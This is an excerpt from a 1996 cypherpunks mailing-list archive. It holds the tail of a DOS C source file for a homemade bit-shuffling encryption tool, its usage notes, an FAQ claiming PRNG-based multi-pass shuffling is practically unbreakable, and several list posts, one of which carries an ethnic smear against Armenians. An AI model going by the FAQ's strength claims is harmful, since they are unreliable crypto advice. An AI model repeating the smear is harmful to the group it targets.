      if (lbyt + itmp > llof) {     /* current file pointer + itmp spans EOF */
         itmp = (U)(llof - lbyt);        /* reset maximum file buffer length */
      }
      ifn_read(cbuf, lbyt, itmp, ebuf);    /* read data into the file buffer */
      if (iopr == 17) {                              /* opcode == unpad bits */
         for (ichr = 0; ichr < itmp; ichr++) {      /* process bytes in cbuf */
            bitput(cbuf, ichr * 8 + 7, 0);           /* set each 8th bit OFF */
         }
         ifn_write(cbuf, lbyt, itmp, ebuf);   /* save current buffer to file */
      } else {                       /* opcode == pad bits - validation pass */
         for (ichr = 0; ichr < itmp; ichr++) {      /* process bytes in cbuf */
            for (ibit = 0; ibit < 8; ibit++) {       /* process bits in cbuf */
               lcnt += bitget(cbuf, ichr * 8 + ibit);/* add 0/1 bit to total */
               if (ibit == 7) {               /* this is the 8th bit of ichr */
                  if (bitget(cbuf, ichr * 8 + ibit)) {  /* the 8th bit is ON */
                     ifn_msgs("8th bit(s) are ON - can't do bit-pad", 4, 24, 79, 1, 1);
                  }     /* can't add bits - display message (above) and exit */
               }
            }
         }
      }
   }
   if (iopr == 17) {                                 /* opcode == unpad bits */
      ifn_msgs("Bit-unpadding complete", 4, 24, 79, 0, 1); /* message & exit */
   }
   ltot = llof * 4 - lcnt;      /* set ltot as the no. of 8th bits to set ON */
   if (ltot > 0) {                 /* one-bits < zero bits; commence padding */
      if (ltot > llof) {             /* one-bits required exceed total bytes */
         ltot = llof;                 /* reset one-bits to equal total bytes */
      }

      itmp = ibuf;               /* reset the copy of the file buffer length */
      ltmp = ltot;                  /* make a copy of the 8th bits to set ON */
      for (lbyt = 0; lbyt < llof; lbyt += itmp) {/* process in itmp segments */
         if (lbyt + itmp > llof) {  /* current file pointer + itmp spans EOF */
            itmp = (U)(llof - lbyt);     /* reset maximum file buffer length */
         }
         ifn_read(cbuf, lbyt, itmp, ebuf); /* read data into the file buffer */
         incr = (U)((llof - lbyt) / ltmp); /* set the bit-pad loop increment */
         for (ichr = 0; ichr < itmp; ichr += incr) { /* loop to set 8th bits */
            bitput(cbuf, ichr * 8 + 7, 1);            /* set each 8th bit ON */
            ltmp--;                   /* decrement the total one-bits padded */
            if (ltmp == 0) {                  /* all 8th bits are now set ON */
               break;                /* all 8th bits are ON - exit ichr loop */
            }
         }
         ifn_write(cbuf, lbyt, itmp, ebuf);   /* save current buffer to file */
         if (ltmp == 0) {                     /* all 8th bits are now set ON */
            break;                   /* all 8th bits are ON - exit lbyt loop */
         }
      }
      ifn_msgs("Bit-padding complete", 4, 24, 79, 0, 0);/* disp.message only */
   } else {                     /* one-bits >= zero bits; padding not needed */
      ifn_msgs("Bit-padding not needed", 4, 24, 79, 1, 0);/* disp.msg.& exit */
      ltot = 0;                 /* reset one-bits required for below message */
   }
   io_vcsr(6, 0, 0);                                  /* relocate the cursor */
   printf("%s%ld", "Total bits in source: ", llof * 8);/* total bits in file */
   io_vcsr(8, 0, 0);                                  /* relocate the cursor */
   printf("%s%ld", "Total one-bits begin: ", lcnt);   /* one-bits before pad */
   io_vcsr(10, 0, 0);                                 /* relocate the cursor */
   printf("%s%ld\n", "Total one-bits added: ", ltot);  /* no. one-bits added */
   fcloseall();                                      /* close all open files */
   exit(0);                                                 /* return to DOS */
}

V ifn_sort(I *int1, I *int2, I *istk, I imax) {  /* array Quicksort function */
   I iext;                            /* initialize the outer-loop exit flag */
   I ilow;                               /* initialize the low array pointer */
   I irdx = 0;                                  /* initialize the sort radix */
   I isp1;                               /* initialize the low stack pointer */
   I isp2;                               /* initialize the top stack pointer */
   I itop;                               /* initialize the top array pointer */
   I iva1;                  /* initialize array value from low stack pointer */
   I iva2;                  /* initialize array value from low stack pointer */

   istk[0] = 0;                          /* initialize the low array pointer */
   istk[1] = imax;                       /* initialize the top array pointer */
   while (irdx >= 0) {                          /* loop until sort radix < 0 */
      isp1 = istk[irdx + irdx];                 /* set the low stack pointer */
      isp2 = istk[irdx + irdx + 1];             /* set the top stack pointer */
      irdx--;                                    /* decrement the sort radix */
      iva1 = int1[isp1];           /* get array value from low stack pointer */
      iva2 = int2[isp1];           /* get array value from low stack pointer */
      itop = isp2 + 1;                          /* set the top array pointer */
      ilow = isp1;                              /* set the low array pointer */
      while (1) {                     /* loop to sort within the radix limit */
         itop--;                          /* decrement the top array pointer */
         if (itop == ilow) {         /* top array pointer==low array pointer */
            break;                               /* skip to next radix value */
         }
         if (iva2 > int2[itop]) {   /* value @low pointer>value @top pointer */
            int1[ilow] = int1[itop];        /* swap low and top array values */
            int2[ilow] = int2[itop];        /* swap low and top array values */
            iext = 0;                     /* initialize outer-loop exit flag */
            while (1) {             /* loop to compare and swap array values */
               ilow++;                    /* increment the low array pointer */
               if (itop == ilow) {   /* top array pointer==low array pointer */
                  iext = 1;                   /* set outer-loop exit flag ON */
                  break;                         /* skip to next radix value */
               }
               if (iva2 < int2[ilow]) {   /* value @low ptr.<value @low ptr. */
                  int1[itop] = int1[ilow];  /* swap top and low array values */
                  int2[itop] = int2[ilow];  /* swap top and low array values */
                  break;               /* repeat sort within the radix limit */
               }
            }
            if (iext) {                        /* outer-loop exit flag is ON */
               break;                            /* skip to next radix value */
            }
         }
      }
      int1[ilow] = iva1;           /* put array value from low stack pointer */
      int2[ilow] = iva2;           /* put array value from low stack pointer */
      if (isp2 - ilow > 1) {                     /* low segment-width is > 1 */
         irdx++;                                 /* increment the sort radix */
         istk[irdx + irdx] = ilow + 1;            /* reset low array pointer */
         istk[irdx + irdx + 1] = isp2;            /* reset top array pointer */
      }
      if (itop - isp1 > 1) {                     /* top segment-width is > 1 */
         irdx++;                                 /* increment the sort radix */
         istk[irdx + irdx] = isp1;                /* reset low array pointer */
         istk[irdx + irdx + 1] = itop - 1;        /* reset top array pointer */
      }
   }
}

V ifn_read(C *cbuf, L lbyt, U ibuf, struct _iobuf *ebuf) {  /* read f/binary */
   fseek(ebuf, lbyt, SEEK_SET);               /* set the buffer-read pointer */
   fread((V *)cbuf, 1, ibuf, ebuf);        /* read data from the binary file */
}

V ifn_write(C *cbuf, L lbyt, U ibuf, struct _iobuf *ebuf) {/* write t/binary */
   fseek(ebuf, lbyt, SEEK_SET);              /* set the buffer-write pointer */
   fwrite((V *)cbuf, 1, ibuf, ebuf);        /* write data to the binary file */
}

U io_vadr(I inop) {                      /* get video address (color or b/w) */
   rg.h.ah = 15;                                   /* video-address function */
   int86(0x10, &rg, &rg);                      /* call DOS for video address */
   if (rg.h.al == 7) {                                /* register A-low is 7 */
      return(0xb000);                                  /* return b/w address */
   } else {                                       /* register A-low is NOT 7 */
      return(0xb800);                                /* return color address */
   }
}

V io_vcls(I iclr) {                                 /* clear screen function */
   I irow;                             /* initialize the row number variable */
   C cdat[81];                             /* initialize the row data buffer */

   memset(cdat, ' ', 80);                       /* clear the row data buffer */
   cdat[80] = '\0';                         /* terminate the row data buffer */
   for (irow = 0; irow < 25; irow++) {          /* loop thru the screen rows */
      io_vdsp(cdat, irow, 0, iclr);       /* display each <blank> screen row */
   }
}

V io_vcsr(I irow, I icol, I icsr) {        /* set cursor position [and size] */
   rg.h.ah = 2;                                  /* cursor-position function */
   rg.h.bh = 0;                                           /* video page zero */
   rg.h.dh = (C)irow;                                          /* row number */
   rg.h.dl = (C)icol;                                       /* column number */
   int86(0x10, &rg, &rg);                     /* call DOS to position cursor */
   if (icsr) {                                      /* cursor-size specified */
      rg.h.ah = 1;                                   /* cursor-size function */
      rg.h.ch = (C)(13 - icsr);                     /* set cursor-begin line */
      rg.h.cl = 12;                                   /* set cursor-end line */
      int86(0x10, &rg, &rg);                  /* call DOS to set cursor size */
   }
}

V io_vdsp(C *cdat, I irow, I icol, I iclr) {       /* display data on screen */
   I ilen = strlen(cdat);                /* length of string to be displayed */
   I iptr;                              /* byte-counter for displayed string */
   U uclr = iclr * 256;                /* unsigned attribute high-byte value */

   if (!uvadr) {                            /* video pointer segment not set */
      FP_SEG(uvadr) = io_vadr(0);               /* set video pointer segment */
   }
   FP_OFF(uvadr) = irow * 160 + icol * 2;        /* set video pointer offset */
   for (iptr = 0; iptr < ilen; iptr ++) {      /* loop thru displayed string */
      *uvadr = uclr + (UC)cdat[iptr];            /* put data to video memory */
      uvadr++;                            /* increment video display pointer */
   }
}
*******************************************************************************
*******************************************************************************
*******************************************************************************
New  CCRP  documentation - changes as of 29.10.1996

----------Command----------    ------------------Output-------------------

CCRP                           Usage parameters.

CCRP  filename  /e             Encrypt each byte in 'filename' so that the
                               data cannot be seen, or, if the file was an
                               executable file, it cannot be executed.

CCRP  filename  /d             Decrypt (restore) each byte in 'filename'.

CCRP  filename  /e  key        Encrypt or decrypt 'filename', but add an
CCRP  filename  /d  key        additional factor (a key, or a password)
                               to the encryption and decryption.

                               NOTE 1: The key/password (if used) must be a
                                       contiguous string of characters with
                                       no blank spaces between any characters.

                               NOTE 2: If a key is entered for encryption, the
                                       same key must be entered for decryption.

                               NOTE 3: Encryption may be performed 2 or more
                                       times in sequence before decryption,
                                       using a different key each time, for
                                       additional encryption security.  In
                                       such case, the decryption steps must
                                       be performed in the reverse order
                                       (last encryption/first decryption).

                               NOTE 4: Encryption and decryption are mere
                                       complementary processes, so that if
                                       the decryption step were performed
                                       first, followed by encryption, the
                                       end effect would be the same.

CCRP  filename  /p             'Pad' 8th bits in 'filename', which must be a
                               '7-bit' ASCII file.  If any 8th bits were set
                               before this option is invoked, a message will
                               be displayed to that effect and changes will
                               not occur.  If all bytes in 'filename' have
                               ASCII values less than 128, then no 8th bits
                               are currently set in that file.

                               If the total number of 1-bits in 'filename' are
                               greater than or equal to the number of 0-bits
                               in the file, a message will be displayed to that
                               effect and, as above, changes will not occur.

                               This option will set only enough 8th bits to
                               equalize the 1-bits and 0-bits in the file,
                               or as many 8th bits as possible if the total
                               bytes in the file (only the 8th bit can be set)
                               are less than the number of 0-bits minus the
                               number of 1-bits in the file.

                               The purpose of bit-padding is to 'normalize' the
                               number of 1-bits in a file before encryption, to
                               further obscure the nature of the source text.

                               The intent of CCRP is actually to NOT alter any
                               bits during encryption, but rather to move them
                               into random positions within the file, so that
                               attackers cannot determine which bits belong to
                               which bytes, etc.  Bit-padding gets around this
                               requirement in that it can only be invoked as a
                               command option separate from an encryption step.
                               Note further that if bit-padding or un-padding
                               is attempted on a file which is in an encrypted
                               state, the file will be damaged beyond repair.

CCRP  filename  /u             'Unpad' 8th bits in 'filename', which must have
                               been a '7-bit' ASCII file prior to padding with
                               8th bits. This option has no warnings, and when
                               used on a file which was not originally '7-bit'
                               ASCII text, will damage the file beyond repair,
                               since the exact 8th bits to change back to 1's
                               cannot be determined.


      WARNING(!) Encryption changes the contents of a file, and if you cannot
                 perform the decryption process properly, including the use of
                 keys/passwords, you won't be able to recover the file at all.

                 Normally, before making changes to a file, you are advised
                 to make a backup copy of the file, but since the purpose of
                 encryption is to make the file unreadable and unusable, to
                 have a usable backup copy of the file on the same computer,
                 or even in the same area that the computer is located in,
                 wouldn't suit the primary purpose of encryption.


NOTES: If maximum security is the objective, you might want to encrypt a file
       several times (in several passes) with a different encryption key each
       pass, using different programs, and mixing the encryption/decryption
       order (OK as long as different keys are used).  Examples:

ENCRYPT.BAT (encrypt the file; see Note 4 above concerning the /d switch)
ccrp filename  /p
bcrp filename  /d  Little_Miss_Muffet_Sat_On_Her_Tuffet
ccrp filename  /e  The_Quick_Brown_Fox_Jumped_Over_The_Lazy_Dog
bcrp filename  /e  We_Have_Met_The_Enemy_And_They_Are_Us
ccrp filename  /d  Let_Him_That_Hath_Understanding_Count_The_Number_Of_The_Beast

DECRYPT.BAT (decrypt the file; see Note 4 above concerning the /e switch)
ccrp filename  /e  Let_Him_That_Hath_Understanding_Count_The_Number_Of_The_Beast
bcrp filename  /d  We_Have_Met_The_Enemy_And_They_Are_Us
ccrp filename  /d  The_Quick_Brown_Fox_Jumped_Over_The_Lazy_Dog
bcrp filename  /e  Little_Miss_Muffet_Sat_On_Her_Tuffet
ccrp filename  /u
*******************************************************************************
*******************************************************************************
*******************************************************************************
FAQ for Cryptography Of A Sort (COAS)
Author  : Dale Thorn <dthorn@gte.net>
Revised : 27 Oct 1996

Q: Is COAS an actual product?
A: COAS is an encryption engine supplied in source-code format, which
   calls some commonly-available (and replaceable) functions included
   with commercial computer-language libraries, which in turn perform
   some of the rudimentary tasks required by the program.  Public Key
   features are not currently supported in COAS, therefore, messaging
   applications are not as well supported as is local file encryption.

Q: What are the main differences between COAS and other non-messaging-oriented
   crypto products?
A: 1. COAS repositions bits based on multiple encoding passes using one or more
      Pseudo-Random Number Generators (PRNG's).  Since COAS is provided only in
      source code format, and since the source code calls the PRNG function in
      the compiler library(s), COAS is actually independent of specific PRNG's.
      NOTE: PRNG limitations, as described in the popular literature, do not
            necessarily apply when repositioning bits in multiple passes, as
            opposed to modifying bits as is normally done in other software.
            Think of "brute force encryption" (more on this below).
   2. COAS does not use a "key" as such, and thus does not "encrypt" the bits
      in a text bitstream.  Instead, it uses an input value (text or numeric)
      as an entry point into a common PRN sequence.  Since the entry point is
      a secret, and since bits are moved using random block sizes, from their
      original bytes into unrelated destination bytes, cryptanalytic attempts
      must necessarily begin with brute-force guessing as to the entry points
      in the PRN sequences, in order to associate the correct bits with their
      original bytes of text.  Multiple encoding passes raise the number of
      guesses exponentially.
   3. COAS source code is extremely small, the primary intent for which was
      to provide a sample encoding engine for local/personal computer files.
      Due to its small size and simplicity, the source code can be easily
      modified by casual users, who may add in their own custom routines.
      NOTE: It cannot be overemphasized, that crypto programs which have
            a widely-respected reputation must also be held suspect when
            A) The very nature of those programs is to deceive, -and-
            B) The source code is either not available, or is so complex
               as to discourage ordinary people from working with it.

Q: But if COAS uses a common, ordinary PRNG, how can it possibly be secure?
A: I can think of two arguments against using PRNG's:
   1. Encoded text is easy to decode by brute force on most computers, -and-
   2. Encoded text can be seen as having regular patterns when "viewed" from
      the vantage point of programs employing higher-dimensional mathematics.
   Addressing the former, a single-pass encryption of a text file using the
   typical PRNG might be breakable in as little as .000001 second on one of
   the larger, faster computers available, however, the same approach might
   require as many as 10^24 years if the number of encoding passes reaches
   ten or more.  To simplify: try to guess the number I'm thinking between
   zero and 32,000.  You can make 16 billion guesses per second, so it will
   take only .000001 second (on average) to get the correct answer.  If you
   had to guess ten numbers correctly (and sequentially), it would require
   roughly (16,000^10) / 16,000,000,000 seconds, approximately 10^24 years.
   Addressing the latter, the ability to "view" the text as a lattice in a
   higher dimension is likewise diminished by the discontinuities inherent
   in multi-pass encoding, when bit-group sizes are determined dynamically
   by PRN's following the secret entry points into the PRNG sequences.

Q: Since COAS only moves bits and doesn't change any of them, wouldn't that
   make cryptanalysis much easier, since the number of 0-bits and 1-bits in
   the encrypted file would be identical to the numbers in the source file?
A: While the COAS encryption processes don't actually change any bits, the
   bit-padding and de-padding options in versions 3.x and above will allow
   you to change 8th bits to 1's in "7-bit" ASCII text, after which you do
   any encryption steps followed (eventually) by decryption and de-padding.

Q: What about the possibility that two or more encryption passes could be
   decrypted in a single pass, as in the scenario where a third key K3 is
   functionally equivalent to two separate encrypting keys K1 and K2?
A: Since COAS encoding is controlled through entry points into a PRNG's
   number sequences (adjacent encryptions may also use different PRNG's
   and/or bit-move logic), searching for a "key" or algorithm which can
   unpack two or more layers of coding will prove futile when all entry
   points into the PRNG's are different, and different PRNG's are used.
   A couple of points to consider:
   One, the output of the PRNG (or any number series) does not describe
   the bit move-to locations; those are determined by sorting the PRN's
   then moving the bits according to the sequence of the original array
   positions of the PRN's prior to sorting. Since some of the PRN's are
   duplicates, the original array positions relative to each other will
   be determined by chance, i.e., the vagaries of the sort process, etc.
   Two, since the bits are moved rather than modified, and since groups
   of bits vary in size, an attempt to find particular bits that belong
   to specific bytes after multi-move shuffling, using any compound key
   or algorithm in a single decoding pass, will certainly prove futile.

Q: Since the personal computer implementation of COAS uses 16-bit integers to
   initialize (set entry points into) the PRNG's, would ten encryption passes
   be somehow equivalent to the use of a 160-bit key in conventional programs?
A: If the conventional program used a 160-bit key in a manner similar to COAS,
   it would still have to:  1) move bits, not change them. 2) use an indirect
   method for specifying move locations.  3) model the processes used in COAS
   quite closely, since there's no straightforward mathematical approach that
   can duplicate the conditions described in the previous question and answer.

Q: What's the difference between the techniques used by COAS and the use of a
   One-Time Pad (OTP)?
A: The theory behind the OTP assumes that (unlike the use of a Public/Private
   key) subsequent encryptions using the same OTP key would reveal the nature
   of the OTP, i.e., any newly-encoded files and messages would share certain
   common identifiable characteristics which could be exploited to facilitate
   the decryption of all files using that pad.
   COAS, on the other hand, doesn't alter any of a file's bits, and therefore
   does not "add" its PRNG entry points' characteristics to a file other than
   shuffling bits in accordance with the original physical positions of PRN's
   which have been sorted by size.

Q: Is it possible for anyone to alter the contents of files encrypted by COAS
   so that a person performing the eventual decryption would not realize that
   the file(s) were indeed altered?
A: Less likely than incidental or brute-force decryption.  Each bit is moved
   once in each encryption pass, and if any bits were moved or changed, that
   many bytes (or nearly as many, since bits are not moved in byte-divisible
   groups, so most will end up in unrelated bytes after encryption) would be
   affected, and the resulting bytes would not likely pass even the simplest
   checksum test.

Q: Is COAS a "weak" product (cryptographically speaking), either because of
   limitations in its own internal algorithms, or in the commercial library
   functions it calls?
A: COAS can be used in ways that produce weak encryption, which is really
   an advantage in encouraging beginners to get started, given its simple
   user interface. Whether it can produce "strong" encryption or not is a
   matter of opinion, where said opinion is not so much a function of the
   product's alleged weaknesses, as it is the fact that cryptography grew
   up from a long history of hand-ciphering and the mathematics attending
   that growth, and the obvious resistance to new paradigms in this field.
   While mathematical proof of encryption strength is highly desirable in
   most applications (some would argue essential in certain applications),
   I see things this way:  Computer software of any kind, which cannot be
   analyzed by common persons (average programmers), whose innards cannot
   be exposed to the masses for whatever reason, should not be used where
   it could effect control over the lives of those people.  Looking at it
   a different way, it's wise for any individual or group to evaluate the
   software that's available, and make their own judgements independently
   of "expert opinion" in the field.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 30 Oct 1996 04:58:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <199610300533.VAA20126@netcom7.netcom.com>
Message-ID: <JL3LwD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: I am not subscribed to this mailing list. I've been forcibly
unsubscribed and not permittecd to resubscribe.

frantz@netcom.com (Bill Frantz) writes:
> I am quite willing to transfer my pledge of $50 (which was given in the
> hope that the event would attract Attila, not Dimitri) to Ray's legal
> defense fund.
>
> I want to be clear that this transfer is only valid for defense.  If the
> fund will be used to legally attack Dimitri, I'd like my money back.  That
> falls in the category of inviting the courts to rule on net-disputes,
> something I would like to discourage.  (Attacking Dimitri seems also to
> fall into the category of bullshit suits, something else I would like to
> discourage.)

You seem to be confused. No one suggested that I have any plans to sue
Ray Arachelian. Some of the lies he and Tim May posted to this mailing
list are probably actionable, but I don't believe in suing over something
said on the net.

Ray Arachelian has repeatedly threatened to sue me over my posts to this
mailing list, and that's what his legal fund is for. It is by no means a
legal "defense" fund.

A related question: when persons of Japanese descent (including 3rd generation
U.S. citizens) were rounded up during WW2 and confined to concentration camps,
where many died from deprivation and disease, why weren't persons of Armenian
descent similarly "interned"? Weren't they even more sympathetic to the Nazis
that persons of German descent?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Wed, 30 Oct 1996 07:33:30 -0800 (PST)
To: "'L. Patrick Elam, III'" <patelam3@mindspring.com>
Subject: RE: Montgolfiering, the Hot Air Balloon of Cryptography
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961030153246Z-7747@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


My IQ is not 207 either, but at least I know satire when I see it. 
 (Perhaps it says something that Mr. Wood is difficult to parody without 
some folks missing the joke!)

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================


----------
From: 	L. Patrick Elam, III[SMTP:patelam3@mindspring.com]
Sent: 	Tuesday, October 29, 1996 9:32 PM
To: 	cypherpunks@toad.com
Subject: 	Re: Montgolfiering, the Hot Air Balloon of Cryptography

To nobody@replay.com (Anonymous):

I will use simple words so you can understand.

My IQ is not 207 but I know BS when I see it.  Too much bravado without
substance.  Too much hot air without mass.  You claim that thermodynamics 
is
about hot air.  Anyone with a basic course in physics knows that
thermodynamics is not just about hot air.

Present the algorithm and it's proof if you want someone to listen or stop
wasting everyones time with your rantings.

Pat

At 10:17 PM 10/29/96 +0100, nobody@replay.com (Anonymous), wrote:
>
>Fie on the small minds that cackle at my brilliance! As a Mensa member 
and
>founder of the Society for Superintelligent Former NSA Employees, I 
chortle
>at the baseness of callow criticisms by those doubters and dilletantous
>denigrators of virtual one-time pads and PRNGs (perfect random number
>generators).
>
>Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
>the evolution of homo sapiens (Parry Messger excepted) toward Shannon's
>dream of a one-time pad needing only a single, easily memorizable number 
as
>a seed. [...remaining hilarity removed...]


begin 600 WINMAIL.DAT
M>)\^(C$/`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <*`!X`
M!P`@`"X``P!3`0$@@ ,`#@```,P'"@`>``<`( `N``,`4P$!"8 !`"$```!#
M-C@R.#<W,T)#,S%$,#$Q.3,P03 P04$P,$$U1C8P1 ``!P$-@ 0``@````(`
M`@`!!( !`#@```!213H@36]N=&=O;&9I97)I;F<L('1H92!(;W0@06ER($)A
M;&QO;VX@;V8@0W)Y<'1O9W)A<&AY`-$3`0.0!@","0``&@````,`)@``````
M`P`V```````>`' ``0```#0```!-;VYT9V]L9FEE<FEN9RP@=&AE($AO="!!
M:7(@0F%L;&]O;B!O9B!#<GEP=&]G<F%P:'D``@%Q``$````;`````;O&.@?X
M<X=]!S&\$="3"@"J`*7V#0`/$.$!``,`+@```````P`&$-"9C[ #``<0P@4`
M`!X`"! !````90```$U925%)4TY/5#(P-T5)5$A%4BQ"551!5$Q%05-424M.
M3U=3051)4D572$5.25-%14E4*%!%4DA!4%-)5%-!65-33TU%5$A)3D=42$%4
M35)73T]$25-$249&24-53%143U!!4D\``````P`0$ `````#`!$0! ````(!
M"1 !````7P8``%L&``"@"@``3%I&=3#@SRS_``H!#P(5`J0#Y 7K`H,`4!,#
M5 (`8V@*P'-E=.XR!@`&PP*#,@/&!Q,"@P8S!$8"`'!R<3$@UPA5![("@S03
M#7T*@ C/Q0G9.Q?_,C4U`H *@8,-L0M@;F<Q,#,4(#<+"A+R# %C`$ %T'D@
MB$E1( 0`(&YO!4"!`= W(&5I=&@$D% L(&)U!4!A!4!LB&5A<P5 22!K'7"5
M!^!S'K!I& `@=QX@'P.@'T 1\" `'@`N("#L*% $D!' < 0@'@`?H5IY!"!S
M`W 2`&@+@&<F(!X0'K%-<B#P5V\+!' =,F0&D&9I8W7B; 5 =&\@"K$$<!SP
M7P/P'A (8"'!(D$@`A!L.FL$(&T$`2*4( !J;S!K92$I"H4*A51UZ&YN>0J%
M/2D?*B\K/T4L3ST*A2!*80>"07<@\"A2)"!L(_$@`"$`?(,C4"^ 96(Z(&@"
M0*!P.B\O=S!@+@N 0R\0& !N8V4N!:!M>"]^="AI'0`PMA41<AYP!; ?P0(@
M+T)01U"\($8BD020%- +@'0OT(DA`$-!': S($42(!)&-6!!0QV@1" PV37P
M-S<M=C&30#)G,3+/+S$O43B?(0`S-C8P'="L1#DYP#5@,S8@,Q(@\C4U8#E#
M**\\3SU?/F^/+.XG? KT+N Q.# "T>!I+3$T- WP#-!"8]D+63$V"J #8'0%
MD 5 OBU$APJ'0SL,,$0&1@-A3R_00Q]$) R"($P@\%"S'K %$&-K-7 +8&T>
M4 ))2E!;4TU44#HG"K!$,$H!,T F4&YDZG,TDF<Q,EU%+T8]!F#?-,)'CTB9
M*% 'D&0A\!Y0DD]$4&]B%7$R.1Y02#$Y.3G@.3HZP5!F34QO1CU4;TZO2'MC
MM'EP'B%P*& F($ D@!QA9#$R4I]-?G5B:J=$052_2'M292_030(A?F<&\"00
M!G$;`!Y0)M)(Y1V!01_@($('0!>0,Y'T;V85$')6H"2 "< A</YH*)9 _3G0
M0P<6(@P!5!BW'6$&X"3P0!@`"U%Y. ,<*$$=<"B !&!U<RG>.B=\'T #\%Y 
M(&1@( !]`)!M"U @`06P2Z B(2#^>0A@5H #D2A@!($?$ !PWU> )WP<[QYR
M'T5"!? @+G-4D"20;741L!Y@,U!V[U=P)) E)0J%<UG@: (Q$?]L&250'I%=
M\24F`, $$"#Q?EEG0@MA.# BTQX2!&%Y[FXN`"0@(9%S"H4!H"5B[V]U(/%C
M\&<P;B !'@$>H/\>8!\`)"!6@ AA9@$+@"2@_U]P=5$$(!]B!" BT@J%<=^]
M'6-J9& >D7-K)WQ0& #_$? ",";#!T!<H 40'A X,/MH(2#!)P0@1 %>H0:0
M9R/^=P!P)81T@B2!+N ?$"!!\P6Q'Q!O< J%?? ?$"*2_&5V!)!T<G;Q!W%T
MM&<Q_P7 ,U ","*1<*!Z77<W"H7F005 &R Z,1W04G"$\4HO49 O4?$K,!L@
M,&\>4&+/8]H>4'=$$F26/M^(YC0P( `SD2;2<P# 9<&_2W,BQ&=P2<!F<1ZQ
M;1SP[VS 9;$',#$!(1-P!"!U$.Y-"? ?L"9 90;0%7%H(1^(Y@(09[->DB;2
M4V]CO0B0=!SP`A %P%G0<%SR[TL!+N T8'N!1@6P!X 5@4I3-3!%9E%O>0G@
M<_]*,5: )5 `(![@B.9QI'4B_PGP!Y $(%ZA9W!>00?@!0'O']"0$(J0!"!B
M'/ E068!_VT06>!$,!'@?(,CX%Y $@#_?@%D48CF#; #`%\Q)("7<3U>H78?
MX#&0!T"*$64M#X%C"K!FT7R24%).1_T$("B0T2\01%&"46T0.#!\;G6.`HCF
MD7$$D)F#*?]H5HE77&PC02+B'4$>`!Y0\V<R'P!K/QT`H.,-L 1@]P" 29 !
MH&P<\'40=) 'X/\*L5=PD6 X, N B.8FTH# ?P;P'H S@EZA)5 $8!^A</\(
MD 8Q(2 *P%[@C7$$$#1AW1W@>#$0!3 )@"DD<7WP_PL@!@`1P"AP`B!\\)BG
M& #_+@!>DG40FIJC00F (I("(/^C`R:"'N >4![Q`Q <\(WA_7PA>J+A( "=
M%*&A8 ]A'S]$%90@(()7@%@W'#E;+O^RP!@``, +@"*2(H +8'PQNQSPLO%O
M@-!7@++ 70M&+Q0A8=H*A1<A`+;P`$ `.0!@\6Z9=\:[`0,`\3\)! ```@%'
M``$````Q````8SU54SMA/2 [<#U);F9E<F5N8V4[;#U,04Y$4E4M.38Q,#,P
M,34S,C0V6BTW-S0W``````(!^3\!````2@````````#<IT#(P$(0&K2Y" `K
M+^&"`0`````````O3SU)3D9%4D5.0T4O3U4]3D]6051/+T-./5)%0TE0245.
M5%,O0TX]5%5.3ED````>`/@_`0```!4```!*86UE<R!!+B!4=6YN:6-L:69F
M90`````"`?L_`0```$H`````````W*= R,!"$!JTN0@`*R_A@@$`````````
M+T\]24Y&15)%3D-%+T]5/4Y/5D%43R]#3CU214-)4$E%3E13+T-./5153DY9
M````'@#Z/P$````5````2F%M97,@02X@5'5N;FEC;&EF9F4`````0 `',#![
M#>!VQKL!0 `(,#"IYYEWQKL!`P`--/T_```"`10T`0```! ```!4E*' *7\0
M&Z6'" `K*B47'@`]``$````%````4D4Z( `````+`"D```````L`(P``````
M`@%_``$```!0````/&,]55,E83U?)7 ]26YF97)E;F-E)6P]3$%.1%)5+3DV
M,3 S,#$U,S(T-EHM-S<T-T!L86YD<G4N;F]V871O+FEN9F5R96YC93(N8V]M
$/@!>WS$U
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Wed, 30 Oct 1996 05:13:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITAR / S 1726 / Civil Disobedience
Message-ID: <9610301303.AA16293@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


Would it be appropriate for other users to forward this message to the prez with their signatures?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Wed, 30 Oct 1996 06:25:51 -0800 (PST)
To: John Gilmore <gnu@toad.com>
Subject: Re: Fortezza web site in Huntsville
In-Reply-To: <199610292028.MAA11182@toad.com>
Message-ID: <v03100602ae9d14f94254@[206.151.234.126]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

John Gilmore said:

>Check out http://www.armadillo.huntsville.al.us.  Bonus points for the
first
>people to identify who actually runs the site.

Ahem. That would be us. We run the Fortezza web site under contract to
NSA. It's their data & design; we just host it. We do make a range of
other products that can use Fortezza or Entrust; we also have some other
products in development using more cypherpunkish cryptosystems.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3

mQEPAzITlkcAAAEIAMLmn2aY/xcMRBa8fSfEpV/FeZf1+JIaRldRRqB7k8Pxwm7h
gNm4GyvnS1CFHqKj5ivE/0M6oMT9X2Zs2fGlz+Gw2HjRdTrX3S8yiqBcyIhlTnCS
QnPxBi+hlH+PwaaxbfBxfDMXduxrGaiH/+h2WxKCurhbjGfh2PmXUnh+KllGvc0w
